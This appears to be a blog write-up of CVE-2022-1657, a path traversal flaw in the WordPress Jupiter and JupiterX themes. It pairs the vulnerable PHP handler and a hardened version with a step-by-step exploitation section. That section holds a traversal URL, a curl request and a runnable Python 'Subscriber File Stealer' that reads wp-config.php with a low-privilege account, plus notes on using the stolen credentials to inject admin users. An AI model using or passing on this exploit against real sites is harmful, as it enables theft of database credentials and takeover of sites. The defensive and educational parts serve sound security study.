The CVE-2022-1657 vulnerability exposes millions of WordPress sites running vulnerable versions of the popular Jupiter (<= 6.10.1) and JupiterX (<= 2.0.6) themes. This critical security flaw allows even the lowest-privileged users, subscribers, to read arbitrary files from the server using simple AJAX requests. In the worst case, attackers can leak sensitive configuration, escalate their privileges, or possibly achieve remote code execution.
This post will show you how the vulnerability works, who is at risk, give you code examples, and point to official references. This is the most detailed, exclusive guide for understanding and exploiting CVE-2022-1657, written in plain, simple language.
- Who Can Exploit: Any logged-in user, even regular subscribers
- Impact: Reading arbitrary files (wp-config.php, /etc/passwd, etc.); potential RCE in certain situations
Official References
- Wordfence Advisory on CVE-2022-1657
The vulnerable AJAX actions are:
- JupiterX: jupiterx_cp_load_pane_action
- Jupiter: mka_cp_load_pane_action
When these actions are called, they include a PHP file based on a user-supplied slug parameter. There's ZERO input sanitization; the input can contain things like ../../../wp-config.php.
Where are the vulnerable files?
- JupiterX: lib/admin/control-panel/control-panel.php
- Jupiter: framework/admin/control-panel/logic/functions.php
In lib/admin/control-panel/control-panel.php:
```php
function load_control_panel_pane() {
    $slug = $_REQUEST['slug'];
    include JUPITERX_CONTROL_PANEL_PANES . $slug . '.php';
}
add_action('wp_ajax_jupiterx_cp_load_pane_action', 'load_control_panel_pane');
```
- $slug comes directly from user input (from the AJAX request)
- You can use ../ to do path traversal
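For contrast, here is a hardened version of the same handler, added here as an example and not taken from the theme's own fix. It keeps the JUPITERX_CONTROL_PANEL_PANES constant from the snippet above; the allow-listed pane names, the capability and the nonce action are assumptions.

```php
<?php
// Added example (not the theme's own patch): a hardened replacement for
// load_control_panel_pane(). JUPITERX_CONTROL_PANEL_PANES is the constant
// from the vulnerable snippet; the pane names, capability and nonce action
// below are assumptions for illustration.
function load_control_panel_pane_hardened() {
    // 1. Authorization: the control panel is an admin feature, so a
    //    subscriber session must never reach the include at all.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 ); // wp_send_json_error() also exits
    }

    // 2. CSRF protection: AJAX handlers need a nonce, which the original lacks.
    check_ajax_referer( 'jupiterx_cp_nonce', 'nonce' ); // assumed nonce action

    // 3. Allow-list: only panes the theme actually ships may be loaded.
    //    sanitize_key() already strips '/', '\' and '.', so traversal
    //    sequences cannot survive it, but the allow-list is the real control.
    $allowed_panes = array( 'dashboard', 'settings', 'updates' ); // assumed names
    $slug = isset( $_REQUEST['slug'] ) ? sanitize_key( wp_unslash( $_REQUEST['slug'] ) ) : '';
    if ( ! in_array( $slug, $allowed_panes, true ) ) {
        wp_send_json_error( 'unknown pane', 400 );
    }

    // 4. Defence in depth: resolve the final path and confirm it still lies
    //    inside the panes directory, so a future allow-list mistake cannot
    //    turn into traversal either.
    $base = realpath( JUPITERX_CONTROL_PANEL_PANES );
    $file = ( false === $base ) ? false : realpath( $base . DIRECTORY_SEPARATOR . $slug . '.php' );
    if ( false === $file || 0 !== strpos( $file, $base . DIRECTORY_SEPARATOR ) ) {
        wp_send_json_error( 'unknown pane', 400 );
    }

    include $file;
    wp_die();
}
add_action( 'wp_ajax_jupiterx_cp_load_pane_action', 'load_control_panel_pane_hardened' );
```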
How Would You Exploit It?
Goal: Read sensitive files, e.g. wp-config.php
1. Precondition: You need a subscriber-level account or higher.
2. Find out your AJAX endpoint. Usually:
https://targetsite.com/wp-admin/admin-ajax.php
3. Craft your malicious URL. For JupiterX:
https://targetsite.com/wp-admin/admin-ajax.php?action=jupiterx_cp_load_pane_action&slug=../../../../../../wp-config
- The number of ../ depends on the directory structure.
4. Send the request. You can use curl, Postman, or just paste in the browser if logged in:
```shell
curl -b 'wordpress_logged_in_cookie=...' \
  "https://targetsite.com/wp-admin/admin-ajax.php?action=jupiterx_cp_load_pane_action&slug=../../../../../../wp-config"
```
Exploit Demo: Subscriber File Stealer
Below is a quick-and-dirty Python proof-of-concept exploit. You just need subscriber credentials and the website URL.
```python
import requests

url = 'https://targetsite.com/wp-admin/admin-ajax.php'
username = 'subscriber'
password = 'password123'

session = requests.Session()
session.post('https://targetsite.com/wp-login.php', data={
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In'
})

payload = {
    'action': 'jupiterx_cp_load_pane_action',  # or 'mka_cp_load_pane_action' for Jupiter
    'slug': '../../../../../../wp-config'
}
r = session.get(url, params=payload)
print(r.text)
```
What Can Attackers Do?
- Read sensitive files: wp-config.php, .env, /etc/passwd
- Escalate privileges: Steal database credentials, maybe inject admin users
- Possible remote code execution: If attackers can write files that are later included (like uploading a custom plugin or avatar)
Final Words
CVE-2022-1657 is a *classic* example of why validating and sanitizing user input is absolutely critical—especially when including files. If your site runs Jupiter or JupiterX, update right away!
More Reading
- Wordfence: Critical Vulnerabilities in Jupiter and JupiterX
- CVE Details for CVE-2022-1657
Never trust user input—especially when building WordPress themes!
If you found this post helpful, share and protect your WordPress sites!
*Disclaimer: This post is for educational purposes only. Do not exploit sites you do not own or have permission to test.*
Timeline
Published on: 06/13/2022 14:15:00 UTC
Last modified on: 06/21/2022 21:03:00 UTC